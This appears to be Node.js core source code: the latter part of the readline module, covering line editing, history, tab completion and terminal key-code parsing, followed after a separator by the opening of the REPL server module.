Interface.prototype.__defineGetter__('columns', function() {
  return this.output.columns || Infinity;
});

Interface.prototype.setPrompt = function(prompt) {
  this._prompt = prompt;
};


Interface.prototype._setRawMode = function(mode) {
  if (util.isFunction(this.input.setRawMode)) {
    return this.input.setRawMode(mode);
  }
};


Interface.prototype.prompt = function(preserveCursor) {
  if (this.paused) this.resume();
  if (this.terminal) {
    if (!preserveCursor) this.cursor = 0;
    this._refreshLine();
  } else {
    this.output.write(this._prompt);
  }
};


Interface.prototype.question = function(query, cb) {
  if (util.isFunction(cb)) {
    if (this._questionCallback) {
      this.prompt();
    } else {
      this._oldPrompt = this._prompt;
      this.setPrompt(query);
      this._questionCallback = cb;
      this.prompt();
    }
  }
};


Interface.prototype._onLine = function(line) {
  if (this._questionCallback) {
    var cb = this._questionCallback;
    this._questionCallback = null;
    this.setPrompt(this._oldPrompt);
    cb(line);
  } else {
    this.emit('line', line);
  }
};


Interface.prototype._addHistory = function() {
  if (this.line.length === 0) return '';

  if (this.history.length === 0 || this.history[0] !== this.line) {
    this.history.unshift(this.line);

    
    if (this.history.length > kHistorySize) this.history.pop();
  }

  this.historyIndex = -1;
  return this.history[0];
};


Interface.prototype._refreshLine = function() {
  
  var line = this._prompt + this.line;
  var dispPos = this._getDisplayPos(line);
  var lineCols = dispPos.cols;
  var lineRows = dispPos.rows;

  
  var cursorPos = this._getCursorPos();

  
  var prevRows = this.prevRows || 0;
  if (prevRows > 0) {
    exports.moveCursor(this.output, 0, -prevRows);
  }

  
  exports.cursorTo(this.output, 0);
  
  exports.clearScreenDown(this.output);

  
  this.output.write(line);

  
  if (lineCols === 0) {
    this.output.write(' ');
  }

  
  exports.cursorTo(this.output, cursorPos.cols);

  var diff = lineRows - cursorPos.rows;
  if (diff > 0) {
    exports.moveCursor(this.output, 0, -diff);
  }

  this.prevRows = cursorPos.rows;
};


Interface.prototype.close = function() {
  if (this.closed) return;
  this.pause();
  if (this.terminal) {
    this._setRawMode(false);
  }
  this.closed = true;
  this.emit('close');
};


Interface.prototype.pause = function() {
  if (this.paused) return;
  this.input.pause();
  this.paused = true;
  this.emit('pause');
  return this;
};


Interface.prototype.resume = function() {
  if (!this.paused) return;
  this.input.resume();
  this.paused = false;
  this.emit('resume');
  return this;
};


Interface.prototype.write = function(d, key) {
  if (this.paused) this.resume();
  this.terminal ? this._ttyWrite(d, key) : this._normalWrite(d);
};


var lineEnding = /\r?\n|\r(?!\n)/;
Interface.prototype._normalWrite = function(b) {
  if (util.isUndefined(b)) {
    return;
  }
  var string = this._decoder.write(b);
  if (this._sawReturn) {
    string = string.replace(/^\n/, '');
    this._sawReturn = false;
  }

  if (this._line_buffer) {
    string = this._line_buffer + string;
    this._line_buffer = null;
  }
  if (lineEnding.test(string)) {
    this._sawReturn = /\r$/.test(string);

    
    var lines = string.split(lineEnding);
    
    string = lines.pop();
    this._line_buffer = string;
    lines.forEach(function(line) {
      this._onLine(line);
    }, this);
  } else if (string) {
    
    this._line_buffer = string;
  }
};

Interface.prototype._insertString = function(c) {
  
  
  
  if (this.cursor < this.line.length) {
    var beg = this.line.slice(0, this.cursor);
    var end = this.line.slice(this.cursor, this.line.length);
    this.line = beg + c + end;
    this.cursor += c.length;
    this._refreshLine();
  } else {
    this.line += c;
    this.cursor += c.length;

    if (this._getCursorPos().cols === 0) {
      this._refreshLine();
    } else {
      this.output.write(c);
    }

    
    this._moveCursor(0);
  }
};

Interface.prototype._tabComplete = function() {
  var self = this;

  self.pause();
  self.completer(self.line.slice(0, self.cursor), function(err, rv) {
    self.resume();

    if (err) {
      
      return;
    }

    var completions = rv[0],
        completeOn = rv[1];  
    if (completions && completions.length) {
      
      if (completions.length === 1) {
        self._insertString(completions[0].slice(completeOn.length));
      } else {
        self.output.write('\r\n');
        var width = completions.reduce(function(a, b) {
          return a.length > b.length ? a : b;
        }).length + 2;  
        var maxColumns = Math.floor(self.columns / width) || 1;
        var group = [], c;
        for (var i = 0, compLen = completions.length; i < compLen; i++) {
          c = completions[i];
          if (c === '') {
            handleGroup(self, group, width, maxColumns);
            group = [];
          } else {
            group.push(c);
          }
        }
        handleGroup(self, group, width, maxColumns);

        // If there is a common prefix to all matches, then apply that
        // portion.
        var f = completions.filter(function(e) { if (e) return e; });
        var prefix = commonPrefix(f);
        if (prefix.length > completeOn.length) {
          self._insertString(prefix.slice(completeOn.length));
        }

      }
      self._refreshLine();
    }
  });
};

// this = Interface instance
function handleGroup(self, group, width, maxColumns) {
  if (group.length == 0) {
    return;
  }
  var minRows = Math.ceil(group.length / maxColumns);
  for (var row = 0; row < minRows; row++) {
    for (var col = 0; col < maxColumns; col++) {
      var idx = row * maxColumns + col;
      if (idx >= group.length) {
        break;
      }
      var item = group[idx];
      self.output.write(item);
      if (col < maxColumns - 1) {
        for (var s = 0, itemLen = item.length; s < width - itemLen;
             s++) {
          self.output.write(' ');
        }
      }
    }
    self.output.write('\r\n');
  }
  self.output.write('\r\n');
}

function commonPrefix(strings) {
  if (!strings || strings.length == 0) {
    return '';
  }
  var sorted = strings.slice().sort();
  var min = sorted[0];
  var max = sorted[sorted.length - 1];
  for (var i = 0, len = min.length; i < len; i++) {
    if (min[i] != max[i]) {
      return min.slice(0, i);
    }
  }
  return min;
}


Interface.prototype._wordLeft = function() {
  if (this.cursor > 0) {
    var leading = this.line.slice(0, this.cursor);
    var match = leading.match(/([^\w\s]+|\w+|)\s*$/);
    this._moveCursor(-match[0].length);
  }
};


Interface.prototype._wordRight = function() {
  if (this.cursor < this.line.length) {
    var trailing = this.line.slice(this.cursor);
    var match = trailing.match(/^(\s+|\W+|\w+)\s*/);
    this._moveCursor(match[0].length);
  }
};


Interface.prototype._deleteLeft = function() {
  if (this.cursor > 0 && this.line.length > 0) {
    this.line = this.line.slice(0, this.cursor - 1) +
                this.line.slice(this.cursor, this.line.length);

    this.cursor--;
    this._refreshLine();
  }
};


Interface.prototype._deleteRight = function() {
  this.line = this.line.slice(0, this.cursor) +
              this.line.slice(this.cursor + 1, this.line.length);
  this._refreshLine();
};


Interface.prototype._deleteWordLeft = function() {
  if (this.cursor > 0) {
    var leading = this.line.slice(0, this.cursor);
    var match = leading.match(/([^\w\s]+|\w+|)\s*$/);
    leading = leading.slice(0, leading.length - match[0].length);
    this.line = leading + this.line.slice(this.cursor, this.line.length);
    this.cursor = leading.length;
    this._refreshLine();
  }
};


Interface.prototype._deleteWordRight = function() {
  if (this.cursor < this.line.length) {
    var trailing = this.line.slice(this.cursor);
    var match = trailing.match(/^(\s+|\W+|\w+)\s*/);
    this.line = this.line.slice(0, this.cursor) +
                trailing.slice(match[0].length);
    this._refreshLine();
  }
};


Interface.prototype._deleteLineLeft = function() {
  this.line = this.line.slice(this.cursor);
  this.cursor = 0;
  this._refreshLine();
};


Interface.prototype._deleteLineRight = function() {
  this.line = this.line.slice(0, this.cursor);
  this._refreshLine();
};


Interface.prototype.clearLine = function() {
  this._moveCursor(+Infinity);
  this.output.write('\r\n');
  this.line = '';
  this.cursor = 0;
  this.prevRows = 0;
};


Interface.prototype._line = function() {
  var line = this._addHistory();
  this.clearLine();
  this._onLine(line);
};


Interface.prototype._historyNext = function() {
  if (this.historyIndex > 0) {
    this.historyIndex--;
    this.line = this.history[this.historyIndex];
    this.cursor = this.line.length; 
    this._refreshLine();

  } else if (this.historyIndex === 0) {
    this.historyIndex = -1;
    this.cursor = 0;
    this.line = '';
    this._refreshLine();
  }
};


Interface.prototype._historyPrev = function() {
  if (this.historyIndex + 1 < this.history.length) {
    this.historyIndex++;
    this.line = this.history[this.historyIndex];
    this.cursor = this.line.length; 

    this._refreshLine();
  }
};



Interface.prototype._getDisplayPos = function(str) {
  var offset = 0;
  var col = this.columns;
  var row = 0;
  var code;
  str = stripVTControlCharacters(str);
  for (var i = 0, len = str.length; i < len; i++) {
    code = codePointAt(str, i);
    if (code >= 0x10000) { 
      i++;
    }
    if (code === 0x0a) { 
      offset = 0;
      row += 1;
      continue;
    }
    if (isFullWidthCodePoint(code)) {
      if ((offset + 1) % col === 0) {
        offset++;
      }
      offset += 2;
    } else {
      offset++;
    }
  }
  var cols = offset % col;
  var rows = row + (offset - cols) / col;
  return {cols: cols, rows: rows};
};


// Returns current cursor's position and line
Interface.prototype._getCursorPos = function() {
  var columns = this.columns;
  var strBeforeCursor = this._prompt + this.line.substring(0, this.cursor);
  var dispPos = this._getDisplayPos(stripVTControlCharacters(strBeforeCursor));
  var cols = dispPos.cols;
  var rows = dispPos.rows;
  // If the cursor is on a full-width character which steps over the line,
  // move the cursor to the beginning of the next line.
  if (cols + 1 === columns &&
      this.cursor < this.line.length &&
      isFullWidthCodePoint(codePointAt(this.line, this.cursor))) {
    rows++;
    cols = 0;
  }
  return {cols: cols, rows: rows};
};


// This function moves cursor dx places to the right
// (-dx for left) and refreshes the line if it is needed
Interface.prototype._moveCursor = function(dx) {
  var oldcursor = this.cursor;
  var oldPos = this._getCursorPos();
  this.cursor += dx;

  // bounds check
  if (this.cursor < 0) this.cursor = 0;
  else if (this.cursor > this.line.length) this.cursor = this.line.length;

  var newPos = this._getCursorPos();

  // check if cursors are in the same line
  if (oldPos.rows === newPos.rows) {
    var diffCursor = this.cursor - oldcursor;
    var diffWidth;
    if (diffCursor < 0) {
      diffWidth = -getStringWidth(
          this.line.substring(this.cursor, oldcursor)
          );
    } else if (diffCursor > 0) {
      diffWidth = getStringWidth(
          this.line.substring(this.cursor, oldcursor)
          );
    }
    exports.moveCursor(this.output, diffWidth, 0);
    this.prevRows = newPos.rows;
  } else {
    this._refreshLine();
  }
};


// handle a write from the tty
Interface.prototype._ttyWrite = function(s, key) {
  key = key || {};

  // Ignore escape key - Fixes #2876
  if (key.name == 'escape') return;

  if (key.ctrl && key.shift) {
    /* Control and shift pressed */
    switch (key.name) {
      case 'backspace':
        this._deleteLineLeft();
        break;

      case 'delete':
        this._deleteLineRight();
        break;
    }

  } else if (key.ctrl) {
    /* Control key pressed */

    switch (key.name) {
      case 'c':
        if (EventEmitter.listenerCount(this, 'SIGINT') > 0) {
          this.emit('SIGINT');
        } else {
          // This readline instance is finished
          this.close();
        }
        break;

      case 'h': // delete left
        this._deleteLeft();
        break;

      case 'd': // delete right or EOF
        if (this.cursor === 0 && this.line.length === 0) {
          // This readline instance is finished
          this.close();
        } else if (this.cursor < this.line.length) {
          this._deleteRight();
        }
        break;

      case 'u': // delete the whole line
        this.cursor = 0;
        this.line = '';
        this._refreshLine();
        break;

      case 'k': // delete from current to end of line
        this._deleteLineRight();
        break;

      case 'a': // go to the start of the line
        this._moveCursor(-Infinity);
        break;

      case 'e': // go to the end of the line
        this._moveCursor(+Infinity);
        break;

      case 'b': // back one character
        this._moveCursor(-1);
        break;

      case 'f': // forward one character
        this._moveCursor(+1);
        break;

      case 'l': // clear the whole screen
        exports.cursorTo(this.output, 0, 0);
        exports.clearScreenDown(this.output);
        this._refreshLine();
        break;

      case 'n': // next history item
        this._historyNext();
        break;

      case 'p': // previous history item
        this._historyPrev();
        break;

      case 'z':
        if (process.platform == 'win32') break;
        if (EventEmitter.listenerCount(this, 'SIGTSTP') > 0) {
          this.emit('SIGTSTP');
        } else {
          process.once('SIGCONT', (function(self) {
            return function() {
              // Don't raise events if stream has already been abandoned.
              if (!self.paused) {
                // Stream must be paused and resumed after SIGCONT to catch
                // SIGINT, SIGTSTP, and EOF.
                self.pause();
                self.emit('SIGCONT');
              }
              // explicitly re-enable "raw mode" and move the cursor to
              // the correct position.
              // See https://github.com/joyent/node/issues/3295.
              self._setRawMode(true);
              self._refreshLine();
            };
          })(this));
          this._setRawMode(false);
          process.kill(process.pid, 'SIGTSTP');
        }
        break;

      case 'w': // delete backwards to a word boundary
      case 'backspace':
        this._deleteWordLeft();
        break;

      case 'delete': // delete forward to a word boundary
        this._deleteWordRight();
        break;

      case 'left':
        this._wordLeft();
        break;

      case 'right':
        this._wordRight();
        break;
    }

  } else if (key.meta) {
    /* Meta key pressed */

    switch (key.name) {
      case 'b': // backward word
        this._wordLeft();
        break;

      case 'f': // forward word
        this._wordRight();
        break;

      case 'd': // delete forward word
      case 'delete':
        this._deleteWordRight();
        break;

      case 'backspace': // delete backwards to a word boundary
        this._deleteWordLeft();
        break;
    }

  } else {
    /* No modifier keys used */

    // \r bookkeeping is only relevant if a \n comes right after.
    if (this._sawReturn && key.name !== 'enter')
      this._sawReturn = false;

    switch (key.name) {
      case 'return':  // carriage return, i.e. \r
        this._sawReturn = true;
        this._line();
        break;

      case 'enter':
        if (this._sawReturn)
          this._sawReturn = false;
        else
          this._line();
        break;

      case 'backspace':
        this._deleteLeft();
        break;

      case 'delete':
        this._deleteRight();
        break;

      case 'tab': // tab completion
        this._tabComplete();
        break;

      case 'left':
        this._moveCursor(-1);
        break;

      case 'right':
        this._moveCursor(+1);
        break;

      case 'home':
        this._moveCursor(-Infinity);
        break;

      case 'end':
        this._moveCursor(+Infinity);
        break;

      case 'up':
        this._historyPrev();
        break;

      case 'down':
        this._historyNext();
        break;

      default:
        if (util.isBuffer(s))
          s = s.toString('utf-8');

        if (s) {
          var lines = s.split(/\r\n|\n|\r/);
          for (var i = 0, len = lines.length; i < len; i++) {
            if (i > 0) {
              this._line();
            }
            this._insertString(lines[i]);
          }
        }
    }
  }
};


exports.Interface = Interface;



/**
 * accepts a readable Stream instance and makes it emit "keypress" events
 */

function emitKeypressEvents(stream) {
  if (stream._keypressDecoder) return;
  var StringDecoder = require('string_decoder').StringDecoder; // lazy load
  stream._keypressDecoder = new StringDecoder('utf8');

  function onData(b) {
    if (EventEmitter.listenerCount(stream, 'keypress') > 0) {
      var r = stream._keypressDecoder.write(b);
      if (r) emitKeys(stream, r);
    } else {
      // Nobody's watching anyway
      stream.removeListener('data', onData);
      stream.on('newListener', onNewListener);
    }
  }

  function onNewListener(event) {
    if (event == 'keypress') {
      stream.on('data', onData);
      stream.removeListener('newListener', onNewListener);
    }
  }

  if (EventEmitter.listenerCount(stream, 'keypress') > 0) {
    stream.on('data', onData);
  } else {
    stream.on('newListener', onNewListener);
  }
}
exports.emitKeypressEvents = emitKeypressEvents;

/*
  Some patterns seen in terminal key escape codes, derived from combos seen
  at http:

  ESC letter
  ESC [ letter
  ESC [ modifier letter
  ESC [ 1 ; modifier letter
  ESC [ num char
  ESC [ num ; modifier char
  ESC O letter
  ESC O modifier letter
  ESC O 1 ; modifier letter
  ESC N letter
  ESC [ [ num ; modifier char
  ESC [ [ 1 ; modifier letter
  ESC ESC [ num char
  ESC ESC O letter

  - char is usually ~ but $ and ^ also happen with rxvt
  - modifier is 1 +
                (shift     * 1) +
                (left_alt  * 2) +
                (ctrl      * 4) +
                (right_alt * 8)
  - two leading ESCs apparently mean the same as one leading ESC
*/

// Regexes used for ansi escape code splitting
var metaKeyCodeReAnywhere = /(?:\x1b)([a-zA-Z0-9])/;
var metaKeyCodeRe = new RegExp('^' + metaKeyCodeReAnywhere.source + '$');
var functionKeyCodeReAnywhere = new RegExp('(?:\x1b+)(O|N|\\[|\\[\\[)(?:' + [
  '(\\d+)(?:;(\\d+))?([~^$])',
  '(?:M([@ #!a`])(.)(.))', // mouse
  '(?:1;)?(\\d+)?([a-zA-Z])'
].join('|') + ')');
var functionKeyCodeRe = new RegExp('^' + functionKeyCodeReAnywhere.source);
var escapeCodeReAnywhere = new RegExp([
  functionKeyCodeReAnywhere.source, metaKeyCodeReAnywhere.source, /\x1b./.source
].join('|'));

function emitKeys(stream, s) {
  if (util.isBuffer(s)) {
    if (s[0] > 127 && util.isUndefined(s[1])) {
      s[0] -= 128;
      s = '\x1b' + s.toString(stream.encoding || 'utf-8');
    } else {
      s = s.toString(stream.encoding || 'utf-8');
    }
  }

  var buffer = [];
  var match;
  while (match = escapeCodeReAnywhere.exec(s)) {
    buffer = buffer.concat(s.slice(0, match.index).split(''));
    buffer.push(match[0]);
    s = s.slice(match.index + match[0].length);
  }
  buffer = buffer.concat(s.split(''));

  buffer.forEach(function(s) {
    var ch,
        key = {
          sequence: s,
          name: undefined,
          ctrl: false,
          meta: false,
          shift: false
        },
        parts;

    if (s === '\r') {
      // carriage return
      key.name = 'return';

    } else if (s === '\n') {
      // enter, should have been called linefeed
      key.name = 'enter';

    } else if (s === '\t') {
      // tab
      key.name = 'tab';

    } else if (s === '\b' || s === '\x7f' ||
               s === '\x1b\x7f' || s === '\x1b\b') {
      // backspace or ctrl+h
      key.name = 'backspace';
      key.meta = (s.charAt(0) === '\x1b');

    } else if (s === '\x1b' || s === '\x1b\x1b') {
      // escape key
      key.name = 'escape';
      key.meta = (s.length === 2);

    } else if (s === ' ' || s === '\x1b ') {
      key.name = 'space';
      key.meta = (s.length === 2);

    } else if (s.length === 1 && s <= '\x1a') {
      // ctrl+letter
      key.name = String.fromCharCode(s.charCodeAt(0) + 'a'.charCodeAt(0) - 1);
      key.ctrl = true;

    } else if (s.length === 1 && s >= 'a' && s <= 'z') {
      // lowercase letter
      key.name = s;

    } else if (s.length === 1 && s >= 'A' && s <= 'Z') {
      // shift+letter
      key.name = s.toLowerCase();
      key.shift = true;

    } else if (parts = metaKeyCodeRe.exec(s)) {
      // meta+character key
      key.name = parts[1].toLowerCase();
      key.meta = true;
      key.shift = /^[A-Z]$/.test(parts[1]);

    } else if (parts = functionKeyCodeRe.exec(s)) {
      // ansi escape sequence

      // reassemble the key code leaving out leading \x1b's,
      // the modifier key bitflag and any meaningless "1;" sequence
      var code = (parts[1] || '') + (parts[2] || '') +
                 (parts[4] || '') + (parts[9] || ''),
          modifier = (parts[3] || parts[8] || 1) - 1;

      // Parse the key modifier
      key.ctrl = !!(modifier & 4);
      key.meta = !!(modifier & 10);
      key.shift = !!(modifier & 1);
      key.code = code;

      // Parse the key itself
      switch (code) {
        /* xterm/gnome ESC O letter */
        case 'OP': key.name = 'f1'; break;
        case 'OQ': key.name = 'f2'; break;
        case 'OR': key.name = 'f3'; break;
        case 'OS': key.name = 'f4'; break;

        
        case '[11~': key.name = 'f1'; break;
        case '[12~': key.name = 'f2'; break;
        case '[13~': key.name = 'f3'; break;
        case '[14~': key.name = 'f4'; break;

        
        case '[[A': key.name = 'f1'; break;
        case '[[B': key.name = 'f2'; break;
        case '[[C': key.name = 'f3'; break;
        case '[[D': key.name = 'f4'; break;
        case '[[E': key.name = 'f5'; break;

        
        case '[15~': key.name = 'f5'; break;
        case '[17~': key.name = 'f6'; break;
        case '[18~': key.name = 'f7'; break;
        case '[19~': key.name = 'f8'; break;
        case '[20~': key.name = 'f9'; break;
        case '[21~': key.name = 'f10'; break;
        case '[23~': key.name = 'f11'; break;
        case '[24~': key.name = 'f12'; break;

        
        case '[A': key.name = 'up'; break;
        case '[B': key.name = 'down'; break;
        case '[C': key.name = 'right'; break;
        case '[D': key.name = 'left'; break;
        case '[E': key.name = 'clear'; break;
        case '[F': key.name = 'end'; break;
        case '[H': key.name = 'home'; break;

        
        case 'OA': key.name = 'up'; break;
        case 'OB': key.name = 'down'; break;
        case 'OC': key.name = 'right'; break;
        case 'OD': key.name = 'left'; break;
        case 'OE': key.name = 'clear'; break;
        case 'OF': key.name = 'end'; break;
        case 'OH': key.name = 'home'; break;

        
        case '[1~': key.name = 'home'; break;
        case '[2~': key.name = 'insert'; break;
        case '[3~': key.name = 'delete'; break;
        case '[4~': key.name = 'end'; break;
        case '[5~': key.name = 'pageup'; break;
        case '[6~': key.name = 'pagedown'; break;

        
        case '[[5~': key.name = 'pageup'; break;
        case '[[6~': key.name = 'pagedown'; break;

        
        case '[7~': key.name = 'home'; break;
        case '[8~': key.name = 'end'; break;

        
        case '[a': key.name = 'up'; key.shift = true; break;
        case '[b': key.name = 'down'; key.shift = true; break;
        case '[c': key.name = 'right'; key.shift = true; break;
        case '[d': key.name = 'left'; key.shift = true; break;
        case '[e': key.name = 'clear'; key.shift = true; break;

        case '[2$': key.name = 'insert'; key.shift = true; break;
        case '[3$': key.name = 'delete'; key.shift = true; break;
        case '[5$': key.name = 'pageup'; key.shift = true; break;
        case '[6$': key.name = 'pagedown'; key.shift = true; break;
        case '[7$': key.name = 'home'; key.shift = true; break;
        case '[8$': key.name = 'end'; key.shift = true; break;

        case 'Oa': key.name = 'up'; key.ctrl = true; break;
        case 'Ob': key.name = 'down'; key.ctrl = true; break;
        case 'Oc': key.name = 'right'; key.ctrl = true; break;
        case 'Od': key.name = 'left'; key.ctrl = true; break;
        case 'Oe': key.name = 'clear'; key.ctrl = true; break;

        case '[2^': key.name = 'insert'; key.ctrl = true; break;
        case '[3^': key.name = 'delete'; key.ctrl = true; break;
        case '[5^': key.name = 'pageup'; key.ctrl = true; break;
        case '[6^': key.name = 'pagedown'; key.ctrl = true; break;
        case '[7^': key.name = 'home'; key.ctrl = true; break;
        case '[8^': key.name = 'end'; key.ctrl = true; break;

        
        case '[Z': key.name = 'tab'; key.shift = true; break;
        default: key.name = 'undefined'; break;

      }
    }

    
    if (util.isUndefined(key.name)) {
      key = undefined;
    }

    if (s.length === 1) {
      ch = s;
    }

    if (key || ch) {
      stream.emit('keypress', ch, key);
    }
  });
}




function cursorTo(stream, x, y) {
  if (!util.isNumber(x) && !util.isNumber(y))
    return;

  if (!util.isNumber(x))
    throw new Error("Can't set cursor row without also setting it's column");

  if (!util.isNumber(y)) {
    stream.write('\x1b[' + (x + 1) + 'G');
  } else {
    stream.write('\x1b[' + (y + 1) + ';' + (x + 1) + 'H');
  }
}
exports.cursorTo = cursorTo;




function moveCursor(stream, dx, dy) {
  if (dx < 0) {
    stream.write('\x1b[' + (-dx) + 'D');
  } else if (dx > 0) {
    stream.write('\x1b[' + dx + 'C');
  }

  if (dy < 0) {
    stream.write('\x1b[' + (-dy) + 'A');
  } else if (dy > 0) {
    stream.write('\x1b[' + dy + 'B');
  }
}
exports.moveCursor = moveCursor;




function clearLine(stream, dir) {
  if (dir < 0) {
    
    stream.write('\x1b[1K');
  } else if (dir > 0) {
    
    stream.write('\x1b[0K');
  } else {
    
    stream.write('\x1b[2K');
  }
}
exports.clearLine = clearLine;




function clearScreenDown(stream) {
  stream.write('\x1b[0J');
}
exports.clearScreenDown = clearScreenDown;




function getStringWidth(str) {
  var width = 0;
  str = stripVTControlCharacters(str);
  for (var i = 0, len = str.length; i < len; i++) {
    var code = codePointAt(str, i);
    if (code >= 0x10000) { 
      i++;
    }
    if (isFullWidthCodePoint(code)) {
      width += 2;
    } else {
      width++;
    }
  }
  return width;
}
exports.getStringWidth = getStringWidth;




function isFullWidthCodePoint(code) {
  if (isNaN(code)) {
    return false;
  }

  
  
  if (code >= 0x1100 && (
      code <= 0x115f ||  
      0x2329 === code || 
      0x232a === code || 
      
      (0x2e80 <= code && code <= 0x3247 && code !== 0x303f) ||
      
      0x3250 <= code && code <= 0x4dbf ||
      
      0x4e00 <= code && code <= 0xa4c6 ||
      
      0xa960 <= code && code <= 0xa97c ||
      
      0xac00 <= code && code <= 0xd7a3 ||
      
      0xf900 <= code && code <= 0xfaff ||
      
      0xfe10 <= code && code <= 0xfe19 ||
      
      0xfe30 <= code && code <= 0xfe6b ||
      
      0xff01 <= code && code <= 0xff60 ||
      0xffe0 <= code && code <= 0xffe6 ||
      
      0x1b000 <= code && code <= 0x1b001 ||
      
      0x1f200 <= code && code <= 0x1f251 ||
      
      0x20000 <= code && code <= 0x3fffd)) {
    return true;
  }
  return false;
}
exports.isFullWidthCodePoint = isFullWidthCodePoint;




function codePointAt(str, index) {
  var code = str.charCodeAt(index);
  var low;
  if (0xd800 <= code && code <= 0xdbff) { 
    low = str.charCodeAt(index + 1);
    if (!isNaN(low)) {
      code = 0x10000 + (code - 0xd800) * 0x400 + (low - 0xdc00);
    }
  }
  return code;
}
exports.codePointAt = codePointAt;



function stripVTControlCharacters(str) {
  str = str.replace(new RegExp(functionKeyCodeReAnywhere.source, 'g'), '');
  return str.replace(new RegExp(metaKeyCodeReAnywhere.source, 'g'), '');
}
exports.stripVTControlCharacters = stripVTControlCharacters;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      

========
























var util = require('util');
var inherits = require('util').inherits;
var Stream = require('stream');
var vm = require('vm');
var path = require('path');
var fs = require('fs');
var rl = require('readline');
var Console = require('console').Console;
var domain = require('domain');





function hasOwnProperty(obj, prop) {
  return Object.prototype.hasOwnProperty.call(obj, prop);
}



module.filename = path.resolve('repl');


module.paths = require('module')._nodeModulePaths(module.filename);



exports.writer = util.inspect;

exports._builtinLibs = ['assert', 'buffer', 'child_process', 'cluster',
  'crypto', 'dgram', 'dns', 'domain', 'events', 'fs', 'http', 'https', 'net',
  'os', 'path', 'punycode', 'querystring', 'readline', 'stream',
  'string_decoder', 'tls', 'tty', 'url', 'util', 'vm', 'zlib', 'smalloc',
  'tracing'];


function REPLServer(prompt, stream, eval_, useGlobal, ignoreUndefined) {
  if (!(this instanceof REPLServer)) {
    return new REPLServer(prompt, stream, eval_, useGlobal, ignoreUndefined);
  }

  var options, input, output, dom;
  if (util.isObject(prompt)) {
    
    options = prompt;
    stream = options.stream || options.socket;
    input = options.input;
    output = options.output;
    eval_ = options.eval;
    useGlobal = options.useGlobal;
    ignoreUndefined = options.ignoreUndefined;
    prompt = options.prompt;
    dom = options.domain;
  } else if (!util.isString(prompt)) {
    throw new Error('An options Object, or a prompt String are required');
  } else {
    options = {};
  }

  var self = this;

  self._domain = dom || domain.create();

  self.useGlobal = !!useGlobal;
  self.ignoreUndefined = !!ignoreUndefined;

  
  self.rli = this;

  eval_ = eval_ || defaultEval;

  function defaultEval(code, context, file, cb) {
    var err, result;
    
    try {
      var script = vm.createScript(code, {
        filename: file,
        displayErrors: false
      });
    } catch (e) {
      
      if (isRecoverableError(e))
        err = new Recoverable(e);
      else
        err = e;
    }

    if (!err) {
      try {
        if (self.useGlobal) {
          result = script.runInThisContext({ displayErrors: false });
        } else {
          result = script.runInContext(context, { displayErrors: false });
        }
      } catch (e) {
        err = e;
        if (err && process.domain) {
          
          process.domain.emit('error', err);
          process.domain.exit();
          return;
        }
      }
    }

    cb(err, result);
  }

  self.eval = self._domain.bind(eval_);

  self._domain.on('error', function(e) {
    
    self.outputStream.write((e.stack || e) + '\n');
    self.bufferedCommand = '';
    self.lines.level = [];
    self.displayPrompt();
  });

  if (!input && !output) {
    
    if (!stream) {
      
      stream = process;
    }
    if (stream.stdin && stream.stdout) {
      
      input = stream.stdin;
      output = stream.stdout;
    } else {
      
      input = stream;
      output = stream;
    }
  }

  self.inputStream = input;
  self.outputStream = output;

  self.resetContext();
  self.bufferedCommand = '';
  self.lines.level = [];

  function complete(text, callback) {
    self.complete(text, callback);
  }

  rl.Interface.apply(this, [
    self.inputStream,
    self.outputStream,
    complete,
    options.terminal
  ]);

  self.setPrompt(!util.isUndefined(prompt) ? prompt : '> ');

  this.commands = {};
  defineDefaultCommands(this);

  
  self.writer = options.writer || exports.writer;

  if (util.isUndefined(options.useColors)) {
    options.useColors = self.terminal;
  }
  self.useColors = !!options.useColors;

  if (self.useColors && self.writer === util.inspect) {
    
    self.writer = function(obj, showHidden, depth) {
      return util.inspect(obj, showHidden, depth, true);
    };
  }

  self.setPrompt(self._prompt);

  self.on('close', function() {
    self.emit('exit');
  });

  var sawSIGINT = false;
  self.on('SIGINT', function() {
    var empty = self.line.length === 0;
    self.clearLine();

    if (!(self.bufferedCommand && self.bufferedCommand.length > 0) && empty) {
      if (sawSIGINT) {
        self.close();
        sawSIGINT = false;
        return;
      }
      self.output.write('(^C again to quit)\n');
      sawSIGINT = true;
    } else {
      sawSIGINT = false;
    }

    self.bufferedCommand = '';
    self.lines.level = [];
    self.displayPrompt();
  });

  self.on('line', function(cmd) {
    
    sawSIGINT = false;
    var skipCatchall = false;
    cmd = trimWhitespace(cmd);

    
    
    if (cmd && cmd.charAt(0) === '.' && isNaN(parseFloat(cmd))) {
      var matches = cmd.match(/^\.([^\s]+)\s*(.*)$/);
      var keyword = matches && matches[1];
      var rest = matches && matches[2];
      if (self.parseREPLKeyword(keyword, rest) === true) {
        return;
      } else {
        self.outputStream.write('Invalid REPL keyword\n');
        skipCatchall = true;
      }
    }

    if (!skipCatchall) {
      var evalCmd = self.bufferedCommand + cmd;
      if (/^\s*\{/.test(evalCmd) && /\}\s*$/.test(evalCmd)) {
        
        
        
        
        evalCmd = '(' + evalCmd + ')\n';
      } else {
        
        
        
        evalCmd = evalCmd + '\n';
      }

      
      self.eval(evalCmd, self.context, 'repl', finish);
    } else {
      finish(null);
    }

    function finish(e, ret) {
      
      self.memory(cmd);

      if (e && !self.bufferedCommand && cmd.trim().match(/^npm /)) {
        self.outputStream.write('npm should be run outside of the ' +
                                'node repl, in your normal shell.\n' +
                                '(Press Control-D to exit.)\n');
        self.bufferedCommand = '';
        self.displayPrompt();
        return;
      }

      
      if (e) {
        if (e instanceof Recoverable) {
          
          
          
          
          self.bufferedCommand += cmd + '\n';
          self.displayPrompt();
          return;
        } else {
          self._domain.emit('error', e);
        }
      }

      
      self.bufferedCommand = '';

      
      if (!e && (!self.ignoreUndefined || !util.isUndefined(ret))) {
        self.context._ = ret;
        self.outputStream.write(self.writer(ret) + '\n');
      }

      
      self.displayPrompt();
    };
  });

  self.on('SIGCONT', function() {
    self.displayPrompt(true);
  });

  self.displayPrompt();
}
inherits(REPLServer, rl.Interface);
